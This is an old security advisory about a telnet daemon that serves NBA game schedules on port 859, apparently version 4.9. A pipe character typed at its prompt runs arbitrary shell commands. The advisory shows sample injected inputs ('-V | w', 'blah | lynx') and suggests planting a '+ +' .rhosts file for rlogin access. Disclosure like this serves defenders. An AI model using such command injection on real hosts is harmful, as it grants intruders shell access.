COMMAND

    nba

SYSTEMS AFFECTED

    Systems with NBA 4.9

PROBLEM

    HD Moore  found following.   On Internet  you may  find a  link to
    telnet  to  a  host  on  port  859,  apparently  a  NBA  (National
    Basketball Association) telnet daemon for showing game  schedules.
    This program  creates a  major secuity  hole on  the machine it is
    running.  At login, you recieve a prompt that looks like <nba>, if
    you type  anything then  the 'pipe'  character "|"  followed by  a
    shell comand,  that command  is executed.   Doing this  you  could
    create a .rhosts  file containing the  classic "+ +",  then giving
    shell access through  rlogin.  It  is also possible  to start lynx
    (or some  other program),  then break  out into  a shell from that
    program.

    usage: /usr/local/bin/nba [-vh] [-nNUM] [-HA] [-C] [-E[d|w]] [-U[d|w]]
    [TEAM|DIV
     [TEAM|DIV]] [mm/dd...]
     With -v, print version information and exit.
       This is version 4.9 for NBA 95-96.
     With -h, print this help message and exit.
     With no teams or divisions specified, print next NUM days (default=1) of
     of league schedule from given date(s) (default is today if none given).
     With one team or division, print next NUM games (default=3) for that team
     or teams in that division.
     With two teams or divisions, print games where first team (or team
     in first division) plays second team (or team in second division).
     -H or -A: Print only home or away games, for first team or division.
     -C: Print monthly calendar format (specify month or default is current).
     -E: Use European dates (dd/mm) and weeks (starting on Monday).
     -U: Use U.S. dates (mm/dd) and weeks (starting on Sunday).
     Teams can specified with or without leading -t, from the following
     list:
       atl - Atlanta            bos - Boston             cha - Charlotte
       chi - Chicago            cle - Cleveland          dal - Dallas
       den - Denver             det - Detroit            gol - Golden State
       hou - Houston            ind - Indiana            lac - LA Clippers
       lal - LA Lakers          mia - Miami              mil - Milwaukee
       min - Minnesota          nj - New Jersey          ny - New York
       orl - Orlando            phi - Philadelphia       pho - Phoenix
       por - Portland           sac - Sacramento         san - San Antonio
       sea - Seattle            tor - Toronto            uta - Utah
       van - Vancouver          was - Washington
     Divisions can specified with or without a leading -d, from the
    following list:
       pac - Pacific            mid - Midwest            ctl - Central
       atc - Atlantic
     The season runs from 11/3 to 4/21.

    <nba> -V | w
    /usr/local/bin/nba: unknown team or division code: -V
    18:00  up 18 days, 14:14,  3 users,  load average: 0.29, 0.96, 0.94
    User     tty        from             login@    idle   JCPU   PCPU what
    xxxxxx p6         lichen           13:17    3days               -ksh
    xxxxxx   p0         zlin             14:25    5days               -tcsh
    xxxxxx  p7         petrie           15:13    2days  24:46     14 -csh
    <nba> blah | lynx

SOLUTION

    Nothing yet that to remove this program.